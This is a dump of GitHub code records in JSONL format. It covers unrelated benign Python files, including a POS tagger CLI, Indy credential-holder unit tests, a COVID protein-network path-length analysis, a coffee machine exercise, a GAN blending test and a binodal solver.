sleep(5)\n","repo_name":"pieterv-icloud-com/k3s-openfaas","sub_path":"docker/k8s-sidecar/sidecar/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":6346,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"42023506151","text":"\"\"\" constants.py\nConstant variables used during the program\n\"\"\"\n\nSTART_DELAY=5\nFORCE_PLAY_DELAY=10\n\nSPECIAL_CARDS={14:'Ace',11:'Jack',12:'Queen',13:'King'}\n\nROYAL_HANDS=[\"Royal Flush\",\"Straight Flush\",\"Four of a Kind\",\"Full House\"]\n\nBODY_TRAITS=[\"hair\",\"eyes\",\"mouth\",\"nose\",\"ears\",\"face\",\"chest\",\"arms\",\n \"hands\",\"waist\",\"hips\",\"ass\",\"groin\",\"legs\",\"feet\",\"phys_trait1\",\n \"phys_trait2\",\"phys_trait3\",\"age\",\"ethnicity\"]\n\nPERSONALITY_TRAITS=[\"pers_trait1\",\"pers_trait2\",\"pers_trait3\"]\n\nSKILL_TRAITS=[\"skill1\",\"skill2\",\"skill3\"]\n\nMENTAL_TRAITS=[\"gender\",\"sexuality\"]+PERSONALITY_TRAITS+SKILL_TRAITS\n\nMODIFIABLE_TRAITS=[\"clothing\",\"relationships\"]\n\nOTHER_TRAITS=[\"name\",\"other1\",\"other2\"]\n\nALL_TRAITS=BODY_TRAITS+MENTAL_TRAITS+MODIFIABLE_TRAITS+OTHER_TRAITS\n\nCH_ORDER_TRAITS=[\"phys_trait1\",\"phys_trait2\",\"phys_trait3\",\n \"pers_trait1\",\"pers_trait2\",\"pers_trait3\",\"skill1\",\"skill2\",\n \"skill3\",\"other1\",\"other2\"]","repo_name":"Catticon25/poker_swap_bot","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"71564481059","text":"import argparse\nfrom naive import NaiveTagger\nfrom viterbi import ViterbiTagger\n\nif __name__ == \"__main__\":\n argparser = argparse.ArgumentParser(description='Parts-of-speech tagger')\n argparser.add_argument(\"-a\", \"--algorithm\", choices=[\"viterbi\", \"naive\"], help=\"Tagging algorithm\", default=\"viterbi\")\n arg_group = argparser.add_mutually_exclusive_group()\n arg_group.add_argument(\"-s\", \"--sentence\", help=\"Tag a sentence\")\n arg_group.add_argument(\"-i\", \"--input_file\", help=\"Input file\")\n arg_group.add_argument(\"-t\", \"--train_file\", help=\"Training file\")\n args = argparser.parse_args()\n\n if args.algorithm == \"viterbi\":\n tagger = ViterbiTagger()\n elif args.algorithm == \"naive\":\n tagger = NaiveTagger()\n\n if args.input_file:\n tagger.tag_file(args.input_file)\n elif args.sentence:\n print(tagger.tag_sentence(args.sentence))\n elif args.train_file:\n tagger.train(args.train_file)\n else:\n argparser.print_help()\n\n# python3 pos.py --train_file\n\n# test with `evalb -p collins.prm gold.gld test.tst`\n# test with `evalb -p collins.prm sentences23.gold sentences23.tst`\n# tgrep:\n\n# to generate a binary\n# tgrep2 -p bank0.top bank0tgrep\n\n# to search for TOP\n# tgrep2 -c bank0tgrep -l TOP | less\n\n# to search for VP, VPN etc (regex support)\n# tgrep2 -c bank0tgrep -l /VP/ | less\n# tgrep2 -c bank0tgrep -l /^VP/ | less\n# tgrep2 -c bank0tgrep -l /^VP$/ | less\n\n# dominates\n# tgrep2 -c bank0tgrep -l '/^NP$/ < /PP/' | less\n\n# directly dominates\n# tgrep2 -c bank0tgrep -l '/^NP$/ << /PP/' | less\n","repo_name":"FelipeCortez/nlp","sub_path":"pos.py","file_name":"pos.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"18724907833","text":"import torch\nimport os\nimport shutil\nimport multiprocessing\nfrom .hdf5_reader import Hdf5Dataset as Dataset\nfrom .consts import time_stamp\nfrom torch.utils.data.sampler import SubsetRandomSampler\nfrom numpy import floor\n\ndef get_results_dir(args):\n \n return os.path.join(args.results_dir,args.run_dir)\n\ndef get_dataloaders(args,ss, data_composition_key,model_key,validation=True):\n\n results_dir = get_results_dir(args)\n\n input_filename = f\"train_test_data_{ss}_supervised.hdf5\"\n \n full_input_filename = os.path.join(args.data_dir,input_filename)\n if not os.path.isfile(full_input_filename):\n print(\"dataloader_provider: fn does not exist!\")\n exit(1)\n\n train_ds = Dataset(full_input_filename, \"supervised\",\"train\",data_composition_key,model_key)\n test_ds = Dataset(full_input_filename, \"supervised\",\"test\",data_composition_key, model_key)\n cpu_count = multiprocessing.cpu_count()\n\n test_data_loader = torch.utils.data.DataLoader(test_ds,num_workers=cpu_count,batch_size=args.batch_size,pin_memory=True,shuffle=False)\n\n if validation:\n validation_split = 0.142857143\n train_ds_size = len(train_ds)\n indices = list(range(train_ds_size))\n split = int(floor(validation_split * train_ds_size))\n\n train_indices, val_indices = indices[split:], indices[:split]\n\n train_sampler = SubsetRandomSampler(train_indices)\n valid_sampler = SubsetRandomSampler(val_indices)\n\n train_data_loader = torch.utils.data.DataLoader(train_ds,num_workers=cpu_count,batch_size=args.batch_size,pin_memory=True,shuffle=False,sampler=train_sampler)\n valid_data_loader = torch.utils.data.DataLoader(train_ds,num_workers=cpu_count,batch_size=args.batch_size,pin_memory=True,shuffle=False,sampler=valid_sampler)\n\n return train_data_loader, valid_data_loader, test_data_loader\n\n train_data_loader = torch.utils.data.DataLoader(train_ds,num_workers=cpu_count,batch_size=args.batch_size,pin_memory=True,shuffle=False)\n\n return train_data_loader, test_data_loader","repo_name":"skynet1010/dataselector","sub_path":"code/utils/dataloader_provider.py","file_name":"dataloader_provider.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"71984960417","text":"import json\n\nfrom asynctest import TestCase as AsyncTestCase\nfrom asynctest import mock as async_mock\n\nfrom indy.error import IndyError, ErrorCode\n\nfrom aries_cloudagent.holder.indy import IndyHolder\nfrom aries_cloudagent.storage.error import StorageError\nfrom aries_cloudagent.storage.record import StorageRecord\nfrom aries_cloudagent.wallet.indy import IndyWallet\n\nimport pytest\n\nfrom ...messaging.issue_credential.v1_0.messages.inner.credential_preview import (\n CredentialPreview\n)\n\n\n@pytest.mark.indy\nclass TestIndyHolder(AsyncTestCase):\n def test_init(self):\n holder = IndyHolder(\"wallet\")\n assert holder.wallet == \"wallet\"\n\n @async_mock.patch(\"indy.anoncreds.prover_create_credential_req\")\n async def test_create_credential_request(self, mock_create_credential_req):\n mock_create_credential_req.return_value = (\"{}\", \"{}\")\n mock_wallet = async_mock.MagicMock()\n\n holder = IndyHolder(mock_wallet)\n cred_req = await holder.create_credential_request(\n \"credential_offer\", \"credential_definition\", \"did\"\n )\n\n mock_create_credential_req.assert_called_once_with(\n mock_wallet.handle,\n \"did\",\n json.dumps(\"credential_offer\"),\n json.dumps(\"credential_definition\"),\n mock_wallet.master_secret_id,\n )\n\n assert cred_req == ({}, {})\n\n @async_mock.patch(\"indy.anoncreds.prover_store_credential\")\n async def test_store_credential(self, mock_store_cred):\n mock_store_cred.return_value = \"cred_id\"\n mock_wallet = async_mock.MagicMock()\n\n holder = IndyHolder(mock_wallet)\n\n cred_id = await holder.store_credential(\n \"credential_definition\", \"credential_data\", \"credential_request_metadata\"\n )\n\n mock_store_cred.assert_called_once_with(\n mock_wallet.handle,\n None,\n json.dumps(\"credential_request_metadata\"),\n json.dumps(\"credential_data\"),\n json.dumps(\"credential_definition\"),\n None,\n )\n\n assert cred_id == \"cred_id\"\n\n @async_mock.patch(\"indy.non_secrets.get_wallet_record\")\n async def test_get_credential_attrs_mime_types(self, mock_nonsec_get_wallet_record):\n cred_id = \"credential_id\"\n dummy_tags = {\"a\": \"1\", \"b\": \"2\"}\n dummy_rec = {\n \"type\": IndyHolder.RECORD_TYPE_MIME_TYPES,\n \"id\": cred_id,\n \"value\": \"value\",\n \"tags\": dummy_tags\n }\n mock_nonsec_get_wallet_record.return_value = json.dumps(dummy_rec)\n\n mock_wallet = async_mock.MagicMock()\n\n holder = IndyHolder(mock_wallet)\n\n mime_types = await holder.get_mime_type(cred_id)\n\n mock_nonsec_get_wallet_record.assert_called_once_with(\n mock_wallet.handle,\n dummy_rec[\"type\"],\n f\"{IndyHolder.RECORD_TYPE_MIME_TYPES}::{dummy_rec['id']}\",\n json.dumps(\n {\n \"retrieveType\": True,\n \"retrieveValue\": True,\n \"retrieveTags\": True\n }\n )\n )\n\n assert mime_types == dummy_tags\n\n @async_mock.patch(\"indy.non_secrets.get_wallet_record\")\n async def test_get_credential_attr_mime_type(self, mock_nonsec_get_wallet_record):\n cred_id = \"credential_id\"\n dummy_tags = {\"a\": \"1\", \"b\": \"2\"}\n dummy_rec = {\n \"type\": IndyHolder.RECORD_TYPE_MIME_TYPES,\n \"id\": cred_id,\n \"value\": \"value\",\n \"tags\": dummy_tags\n }\n mock_nonsec_get_wallet_record.return_value = json.dumps(dummy_rec)\n\n mock_wallet = async_mock.MagicMock()\n\n holder = IndyHolder(mock_wallet)\n\n a_mime_type = await holder.get_mime_type(cred_id, \"a\")\n\n mock_nonsec_get_wallet_record.assert_called_once_with(\n mock_wallet.handle,\n dummy_rec[\"type\"],\n f\"{IndyHolder.RECORD_TYPE_MIME_TYPES}::{dummy_rec['id']}\",\n json.dumps(\n {\n \"retrieveType\": True,\n \"retrieveValue\": True,\n \"retrieveTags\": True\n }\n )\n )\n\n assert a_mime_type == dummy_tags[\"a\"]\n\n @async_mock.patch(\"indy.anoncreds.prover_search_credentials\")\n @async_mock.patch(\"indy.anoncreds.prover_fetch_credentials\")\n @async_mock.patch(\"indy.anoncreds.prover_close_credentials_search\")\n async def test_get_credentials(\n self, mock_close_cred_search, mock_fetch_credentials, mock_search_credentials\n ):\n mock_search_credentials.return_value = (\"search_handle\", \"record_count\")\n mock_fetch_credentials.return_value = \"[1,2,3]\"\n\n mock_wallet = async_mock.MagicMock()\n holder = IndyHolder(mock_wallet)\n\n credentials = await holder.get_credentials(0, 0, {})\n\n mock_search_credentials.assert_called_once_with(\n mock_wallet.handle, json.dumps({})\n )\n\n mock_fetch_credentials.return_value = \"[1,2,3]\"\n\n mock_fetch_credentials.assert_called_once_with(\"search_handle\", 0)\n mock_close_cred_search.assert_called_once_with(\"search_handle\")\n\n assert credentials == json.loads(\"[1,2,3]\")\n\n @async_mock.patch(\"indy.anoncreds.prover_search_credentials\")\n @async_mock.patch(\"indy.anoncreds.prover_fetch_credentials\")\n @async_mock.patch(\"indy.anoncreds.prover_close_credentials_search\")\n async def test_get_credentials_seek(\n self, mock_close_cred_search, mock_fetch_credentials, mock_search_credentials\n ):\n mock_search_credentials.return_value = (\"search_handle\", \"record_count\")\n mock_fetch_credentials.return_value = \"[1,2,3]\"\n\n mock_wallet = async_mock.MagicMock()\n holder = IndyHolder(mock_wallet)\n\n credentials = await holder.get_credentials(2, 3, {})\n\n assert mock_fetch_credentials.call_args_list == [\n ((\"search_handle\", 2),),\n ((\"search_handle\", 3),),\n ]\n\n @async_mock.patch(\"indy.anoncreds.prover_search_credentials_for_proof_req\")\n @async_mock.patch(\"indy.anoncreds.prover_fetch_credentials_for_proof_req\")\n @async_mock.patch(\"indy.anoncreds.prover_close_credentials_search_for_proof_req\")\n async def test_get_credentials_for_presentation_request_by_referent(\n self,\n mock_prover_close_credentials_search_for_proof_req,\n mock_prover_fetch_credentials_for_proof_req,\n mock_prover_search_credentials_for_proof_req,\n ):\n mock_prover_search_credentials_for_proof_req.return_value = \"search_handle\"\n mock_prover_fetch_credentials_for_proof_req.return_value = (\n '[{\"cred_info\": {\"referent\": \"asdb\"}}]'\n )\n\n mock_wallet = async_mock.MagicMock()\n holder = IndyHolder(mock_wallet)\n\n credentials = await holder.get_credentials_for_presentation_request_by_referent(\n {\"p\": \"r\"}, (\"asdb\",), 2, 3, {\"e\": \"q\"}\n )\n\n mock_prover_search_credentials_for_proof_req.assert_called_once_with(\n mock_wallet.handle, json.dumps({\"p\": \"r\"}), json.dumps({\"e\": \"q\"})\n )\n\n assert mock_prover_fetch_credentials_for_proof_req.call_args_list == [\n ((\"search_handle\", \"asdb\", 2),),\n ((\"search_handle\", \"asdb\", 3),),\n ]\n\n mock_prover_close_credentials_search_for_proof_req.assert_called_once_with(\n \"search_handle\"\n )\n\n assert credentials == (\n {\"cred_info\": {\"referent\": \"asdb\"}, \"presentation_referents\": [\"asdb\"]},\n )\n\n @async_mock.patch(\"indy.anoncreds.prover_get_credential\")\n async def test_get_credential(self, mock_get_cred):\n mock_get_cred.return_value = \"{}\"\n\n mock_wallet = async_mock.MagicMock()\n holder = IndyHolder(mock_wallet)\n\n credential = await holder.get_credential(\"credential_id\")\n\n mock_get_cred.assert_called_once_with(mock_wallet.handle, \"credential_id\")\n\n assert credential == json.loads(\"{}\")\n\n @async_mock.patch(\"indy.anoncreds.prover_delete_credential\")\n @async_mock.patch(\"indy.non_secrets.get_wallet_record\")\n @async_mock.patch(\"indy.non_secrets.delete_wallet_record\")\n async def test_delete_credential(\n self,\n mock_nonsec_del_wallet_record,\n mock_nonsec_get_wallet_record,\n mock_prover_del_cred\n ):\n mock_wallet = async_mock.MagicMock()\n holder = IndyHolder(mock_wallet)\n mock_nonsec_get_wallet_record.return_value = json.dumps(\n {\n \"type\": \"typ\",\n \"id\": \"ident\",\n \"value\": \"value\",\n \"tags\": {\n \"a\": json.dumps(\"1\"),\n \"b\": json.dumps(\"2\")\n }\n }\n )\n\n credential = await holder.delete_credential(\"credential_id\")\n\n mock_prover_del_cred.assert_called_once_with(\n mock_wallet.handle,\n \"credential_id\"\n )\n\n @async_mock.patch(\"indy.anoncreds.prover_create_proof\")\n async def test_create_presentation(self, mock_create_proof):\n mock_create_proof.return_value = \"{}\"\n\n mock_wallet = async_mock.MagicMock()\n holder = IndyHolder(mock_wallet)\n\n presentation = await holder.create_presentation(\n \"presentation_request\",\n \"requested_credentials\",\n \"schemas\",\n \"credential_definitions\",\n )\n\n mock_create_proof.assert_called_once_with(\n mock_wallet.handle,\n json.dumps(\"presentation_request\"),\n json.dumps(\"requested_credentials\"),\n mock_wallet.master_secret_id,\n json.dumps(\"schemas\"),\n json.dumps(\"credential_definitions\"),\n json.dumps({}),\n )\n\n assert presentation == json.loads(\"{}\")\n","repo_name":"OpenMined/PyAriesFL","sub_path":"aries_cloudagent/holder/tests/test_indy.py","file_name":"test_indy.py","file_ext":"py","file_size_in_byte":9830,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"34"} +{"seq_id":"2965593982","text":"# Created by woochanghwang at 17/07/2021\n\n# Created by woochanghwang at 17/06/2020\n\nimport pandas as pd\nimport toolbox.data_handler as dh\nimport itertools\nimport networkx as nx\nimport matplotlib.pyplot as plt\nfrom collections import Counter\nimport seaborn as sns\n\n'''\nCalculate all shotest paths between DIP and DEP \nget ratio \nlength 1\nlength 2\nlength 3\n'''\n\ndef remove_DIP_DEP_self_edges(covid_graph, dip_in_graph, dep_in_graph):\n covid_graph_edges = covid_graph.edges()\n\n covid_graph_edges_no_DIP_DEP_self = []\n\n for edge in covid_graph_edges:\n if len(set(edge)&set(dip_in_graph))==2: continue\n elif len(set(edge)&set(dep_in_graph))==2: continue\n else:\n covid_graph_edges_no_DIP_DEP_self.append(edge)\n\n return nx.Graph(covid_graph_edges_no_DIP_DEP_self)\n\ndef find_pair_shortest_path_length(covid_graph, dip_proteins, dep_proteins, virus):\n\n covid_graph_nodes = list(covid_graph.nodes())\n\n dip_in_graph = list(set(dip_proteins)&set(covid_graph_nodes))\n dep_in_graph = list((set(dep_proteins)&set(covid_graph_nodes))-set(dip_in_graph))\n hidden_in_graph = list(set(covid_graph_nodes) - set(dip_in_graph) - set(dep_in_graph))\n\n print(len(dip_in_graph), len(dep_in_graph), len(hidden_in_graph), virus)\n dip_dep_pair_list = list(itertools.product(dip_in_graph, dep_in_graph))\n\n print(len(dip_dep_pair_list))\n # print(dip_dep_pair_list[:5])\n\n print(len(covid_graph.edges()))\n covid_graph = remove_DIP_DEP_self_edges(covid_graph, dip_in_graph, dep_in_graph)\n\n print(len(covid_graph.edges()))\n\n dip_dep_pair_path_length_list = []\n dip_dep_pair_no_path = []\n for pair in dip_dep_pair_list:\n pair = list(pair)\n pair_length = pair[:]\n try:\n length = nx.shortest_path_length(covid_graph,source=pair[0],target=pair[1])\n pair_length.append(length)\n dip_dep_pair_path_length_list.append(pair_length)\n\n except:\n print(pair)\n dip_dep_pair_no_path.append(pair)\n\n dip_dep_pair_path_length_df = pd.DataFrame(dip_dep_pair_path_length_list,columns=['Protein','Protein','Path_length'])\n dip_dep_pair_path_length_addr = f\"../result/{virus}/network/{virus}_dip_to_dep_path_length_no_DIP_DEP_self.csv\"\n dip_dep_pair_path_length_df.to_csv(dip_dep_pair_path_length_addr,index=False)\n\n dip_dep_pair_no_path_df = pd.DataFrame(dip_dep_pair_no_path,columns=['DIP','DEP'])\n dip_dep_pair_no_path_df.to_csv(f\"../result/{virus}/network/{virus}_dip_to_dep_no_path.csv\")\n\n ################################################\n\n # dip_dep_pair_path_length_df.plot.hist(grid=True, bins=20, rwidth=0.9,color='#607c8e')\n # dip_dep_pair_path_length_df.plot.hist(grid=True,alpha=0.5, color='#607c8e')\n # plt.title('COVID19 network DIP to DEP path length')\n # plt.xlabel('Length')\n # plt.ylabel('DIP,DEP pair')\n # # plt.grid(axis='y', alpha=0.75)\n # plt.show()\n\ndef draw_path_length_histogram():\n dip_dep_pair_path_length_SARS_CoV_addr = \"../result/SARS-CoV/network/SARS-CoV_dip_to_dep_path_length_no_DIP_DEP_self.csv\"\n dip_dep_pair_path_length_SARS_CoV_2_addr = \"../result/SARS-CoV-2/network/SARS-CoV-2_dip_to_dep_path_length_no_DIP_DEP_self.csv\"\n\n\n pair_path_length_SARS_CoV_df = pd.read_csv(dip_dep_pair_path_length_SARS_CoV_addr)\n pair_path_length_SARS_CoV_2_df = pd.read_csv(dip_dep_pair_path_length_SARS_CoV_2_addr)\n\n # length_6, pair_numbers_6 = zip(*Counter(pair_path_length_SARS_CoV_df['Path_length'].to_list()).items())\n # length_24, pair_numbers_24 = zip(*Counter(pair_path_length_SARS_CoV_2_df['Path_length'].to_list()).items())\n #\n # print(length_6,pair_numbers_6)\n\n pair_length_SARS_CoV_counter= Counter(pair_path_length_SARS_CoV_df['Path_length'].to_list())\n pair_length_SARS_CoV_2_counter = Counter(pair_path_length_SARS_CoV_2_df['Path_length'].to_list())\n\n pair_length_SARS_CoV_counter_df = pd.DataFrame.from_dict(pair_length_SARS_CoV_counter,orient='index').reset_index()\n pair_length_SARS_CoV_counter_df = pair_length_SARS_CoV_counter_df.rename(columns={'index':'length', 0:'DIP-DEP_pairs'})\n pair_length_SARS_CoV_counter_df['network'] = 'SARS-CoV'\n\n total_pairs = pair_length_SARS_CoV_counter_df['DIP-DEP_pairs'].sum()\n pair_length_SARS_CoV_counter_df['percentage'] = pair_length_SARS_CoV_counter_df['DIP-DEP_pairs']/total_pairs * 100\n\n pair_length_SARS_CoV_2_counter_df = pd.DataFrame.from_dict(pair_length_SARS_CoV_2_counter, orient='index').reset_index()\n pair_length_SARS_CoV_2_counter_df = pair_length_SARS_CoV_2_counter_df.rename(columns={'index': 'length', 0: 'DIP-DEP_pairs'})\n pair_length_SARS_CoV_2_counter_df['network'] = 'SARS-CoV-2'\n total_pairs = pair_length_SARS_CoV_2_counter_df['DIP-DEP_pairs'].sum()\n pair_length_SARS_CoV_2_counter_df['percentage'] = pair_length_SARS_CoV_2_counter_df['DIP-DEP_pairs']/total_pairs * 100\n\n pair_length_counter_df = pd.concat([pair_length_SARS_CoV_counter_df, pair_length_SARS_CoV_2_counter_df])\n # pair_length_counter_df = pair_length_counter_df.sort_values(by='length',ascending=False)\n print(pair_length_counter_df)\n\n ## sns.catplot(x='length',y='DIP-DEP_pairs',hue='network', data=pair_length_counter_df, kind='bar')\n ax = sns.histplot(data=pair_length_counter_df,\n x = 'network',\n weights='percentage',\n hue='length',\n multiple='stack',\n edgecolor='white',\n # palette='tab20c',\n palette = \"Set3\",\n hue_order=[9,8,7,6,5,4,3,2,1],\n shrink=0.8)\n # print(pair_length_SARS_CoV_counter)\n # n,bins,patches = plt.hist([pair_path_length_SARS_CoV_df['Path_length'],pair_path_length_SARS_CoV_2_df['Path_length']])\n # plt.grid()\n ax.set_ylabel('Percentage')\n ax.set_xlabel('Virus')\n legend = ax.get_legend()\n legend.set_bbox_to_anchor((1, 1))\n plt.tight_layout()\n\n # plt.savefig(\"../result/covid19_dip_to_dep_path_barplot_no_DIP_DEP_self.png\")\n # plt.savefig(\"../result/covid19_dip_to_dep_path_stack_barplot_no_DIP_DEP_self.pdf\")\n plt.show()\n # sns.barplot()\n\n\n\ndef main():\n viruses = ['SARS-CoV', 'SARS-CoV-2']\n virus = viruses[1]\n graph_addr = f\"../result/{virus}/network/{virus}_All_Structure_All_Shortest_Paths_Graph\"\n covid_graph = dh.load_obj(graph_addr)\n\n\n dip_proteins = pd.read_csv(f\"../Data/DIP/{virus}_DIP.csv\")['gene_name'].tolist()\n dep_proteins = pd.read_csv(f\"../Data/DEP/{virus}_DEP.csv\")['Gene_name'].tolist()\n\n # find_pair_shortest_path_length(covid_graph, dip_proteins, dep_proteins, virus)\n\n draw_path_length_histogram()\n\n\nif __name__ == '__main__':\n main()","repo_name":"wchwang/Method_Pancorona","sub_path":"analyse_SIP_find_shortest_paths_BW_DIP_DEP.py","file_name":"analyse_SIP_find_shortest_paths_BW_DIP_DEP.py","file_ext":"py","file_size_in_byte":6728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"70001851939","text":"from typing import Optional\nfrom typing import Generator\nfrom fastapi import Query\nimport logging\n\nfrom app.api.v1.schemas.pagination_schema import PaginationQuery\n\nfrom app.database.database import SessionLocal\nlog = logging.getLogger(\"uvicorn\")\n\ndef get_db() -> Generator:\n try:\n db = SessionLocal()\n yield db\n except Exception:\n pass\n finally:\n db.close()\ndef get_pagination_query(\n page: Optional[int] = Query(1, title=\"page\", ge=1),\n per_page: Optional[int] = Query(30, title=\"items for page\", ge=1, le=9999),\n) -> PaginationQuery:\n return PaginationQuery(page=page, per_page=per_page)\n\n","repo_name":"blasmoyano/remember_to_buy","sub_path":"app/api/v1/depends/depends.py","file_name":"depends.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"39462607452","text":"# Starting data\nMENU = {\n \"espresso\": {\n \"ingredients\": {\n \"water\": 50,\n \"milk\": 0,\n \"coffee\": 18,\n },\n \"cost\": 1.5,\n },\n \"latte\": {\n \"ingredients\": {\n \"water\": 200,\n \"milk\": 150,\n \"coffee\": 24,\n },\n \"cost\": 2.5,\n },\n \"cappuccino\": {\n \"ingredients\": {\n \"water\": 250,\n \"milk\": 100,\n \"coffee\": 24,\n },\n \"cost\": 3.0,\n }\n}\n\nprofit = 0\nresources = {\n \"water\": 300,\n \"milk\": 200,\n \"coffee\": 100,\n}\n\n# money values\nquarter_value = 0.25\ndimes_value = 0.1\nnickel_value = 0.05\npennies_value = 0.01\n\n\ndef get_report():\n print(f\"Water: {resources['water']}ml\\nMilk: {resources['milk']}ml\\n\"\n f\"Coffee: {resources['coffee']}g\\nMoney: ${profit}\")\n\n\ndef check_resources(coffee):\n water_left = resources['water'] - MENU[coffee]['ingredients']['water']\n milk_left = resources['milk'] - MENU[coffee]['ingredients']['milk']\n coffee_left = resources['coffee'] - MENU[coffee]['ingredients']['coffee']\n\n if water_left < 0:\n return 'water'\n elif milk_left < 0:\n return 'milk'\n elif coffee_left < 0:\n return 'coffee'\n else:\n return False\n\n\ndef deduct_resource(coffee):\n resources['water'] = resources['water'] - MENU[coffee]['ingredients']['water']\n resources['milk'] = resources['milk'] - MENU[coffee]['ingredients']['milk']\n resources['coffee'] = resources['coffee'] - MENU[coffee]['ingredients']['coffee']\n\n\ndef process_coins(coffee):\n print('Please insert coins.')\n quarters = float(input('how many quarters?: '))\n dimes = float(input('how many dimes?: '))\n nickles = float(input('how many nickles?: '))\n pennies = float(input('how many pennies?: '))\n\n money_got = (quarters * quarter_value) + (dimes * dimes_value) + (nickles * nickel_value) + \\\n (pennies * pennies_value)\n\n change_left = money_got - MENU[coffee]['cost']\n global profit\n profit += MENU[coffee]['cost']\n return round(change_left, 2)\n\n\nwhile True:\n userInput = input(\"What would you like? (espresso/latte/cappuccino): \")\n\n if userInput == \"report\":\n get_report()\n elif userInput == \"off\":\n break\n elif userInput == 'espresso' or userInput == 'latte' or userInput == 'cappuccino':\n # check resources\n resource_not_available = check_resources(userInput)\n if resource_not_available:\n print(f\"Sorry there is not enough {resource_not_available}\")\n continue\n else:\n # Process Coins\n change = process_coins(userInput)\n\n if change > 0:\n deduct_resource(userInput)\n print(f\"Here is ${change} dollars in change.\")\n print(\"Thank you for waiting..\")\n print(f\"Here is your special {userInput} ☕. Enjoy!\")\n else:\n print(\"Sorry that's not enough money. Money refunded.\")\n continue\n","repo_name":"NilGamer/Coffee-Machine-Project","sub_path":"myMain.py","file_name":"myMain.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"27678575435","text":"import os\nimport time\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nfrom torch.utils.data import DataLoader\nimport numpy as np\nimport cv2\nfrom tqdm import tqdm\nimport imageio\n\nimport res_unet\nfrom SwappedDataset import SwappedDatasetLoader\nimport utils\nimport img_utils\n\nfrom blending import *\n\ndef transfer_mask(img1, img2, mask):\n return img1 * mask + img2 * (1 - mask)\n\ndef Test(G, testLoader, device):\n pbar = tqdm(enumerate(testLoader), total=len(testLoader), leave=False)\n\n with torch.no_grad():\n G.eval()\n for i, images in pbar:\n\n source = images['source'].to(device) #(fg)\n target = images['target'].to(device) #(bg)\n swap = images['swap'].to(device) #(sw)\n mask = images['mask'].to(device) #(mask) \n\n # Overlaid image\n overlaid_image = transfer_mask(swap, target, mask)\n # Feed the network with images from test set\n img_transfer_input = torch.cat((overlaid_image, target, mask), dim=1).to(device)\n\n # Blend images\n pred = G(img_transfer_input)\n\n for b in range(source.shape[0]):\n img = img_utils.tensor2rgb(source[b])\n imageio.imwrite(visuals_loc + '/Epoch_%d_output_%d_%d.png' % (20, i, b), img)\n\n\nif __name__ == '__main__':\n\n cudaDevice = ''\n\n if len(cudaDevice) < 1:\n if torch.cuda.is_available():\n device = torch.device('cuda')\n print('[*] GPU Device selected as default execution device.')\n else:\n device = torch.device('cpu')\n print('[X] WARN: No GPU Devices found on the system! Using the CPU. '\n 'Execution maybe slow!')\n else:\n device = torch.device('cuda:%s' % cudaDevice)\n print('[*] GPU Device %s selected as default execution device.' %\n cudaDevice)\n\n G_PATH = 'Exp_BlenderOriginal/checkpoints/checkpoint_G_20.pth'\n\n test_list = 'test.str'\n data_root = './data_set/data_set/'\n batch_size = 8\n testDataset = SwappedDatasetLoader(test_list, data_root)\n testLoader = torch.utils.data.DataLoader(dataset=testDataset, batch_size=batch_size, shuffle=True)\n\n generator = res_unet.MultiScaleResUNet(in_nc=7)\n generator, _, _ = utils.loadModels(generator, path=G_PATH)\n\n generator.to(device)\n\n experiment_name = 'BlenderOriginal'\n visuals_loc = 'Exp_%s/source_imgs/' % experiment_name.replace(' ', '_')\n os.makedirs(visuals_loc, exist_ok=True)\n\n Test(generator, testLoader, device)\n ","repo_name":"irenepap2/CV2_assignments","sub_path":"assignment3/cv2_2022_assignment3/gan_blender_release/test_blender.py","file_name":"test_blender.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"199090336","text":"\"\"\"\nroutines to find binodal point between two phases\n\"\"\"\n\nimport numpy as np\nfrom scipy import optimize\n\ndef get_binodal_point(ref,IDs,muA,muB,\n reweight_kwargs={},\n full_output=False,\n **kwargs):\n \"\"\"\n calculate binodal point where Omega[ID[0]]==Omega[ID[1]]\n\n Parameters\n ----------\n ref : lnPi_phases object\n object to reweight\n\n IDs : (ID0,ID1)\n phaseIDs of pair to equate\n\n muA,muB : mu arrays bracketing solution\n\n reweight_kwargs : dict\n extra arguments to reweight\n \n full_output : bool (Default False)\n if True, return solve stats\n\n **kwargs : extra arguments to scipy.optimize.brentq\n\n Returns\n -------\n binodal : lnPi_phases object at binodal point\n\n stats : solve stats object from brentq (optional, returned if full_output is True)\n \"\"\"\n\n assert len(IDs)==2\n\n muA = np.asarray(muA)\n muB = np.asarray(muB)\n \n \n msk = muA != muB\n if msk.sum()!=1:\n raise ValueError('only one value can vary between muA and muB')\n\n mu_idx = np.where(msk)[0][0]\n mu_in = muA.copy()\n\n a,b = sorted([x[mu_idx] for x in [muA,muB]])\n \n reweight_kwargs = dict(dict(ZeroMax=True),**reweight_kwargs)\n\n \n def f(x):\n mu = mu_in[:]\n mu[mu_idx] = x\n c = ref.reweight(mu,**reweight_kwargs)\n f.lnpi = c\n \n Omegas = c.Omegas_phaseIDs()\n \n return Omegas[IDs[0]] - Omegas[IDs[1]]\n\n\n xx,r = optimize.brentq(f,a,b,full_output=True,**kwargs)\n\n r.residual = f(xx)\n\n if full_output:\n return f.lnpi,r\n else:\n return f.lnpi\n\n","repo_name":"dwsideriusNIST/lnPi","sub_path":"lnPi/binodal.py","file_name":"binodal.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} 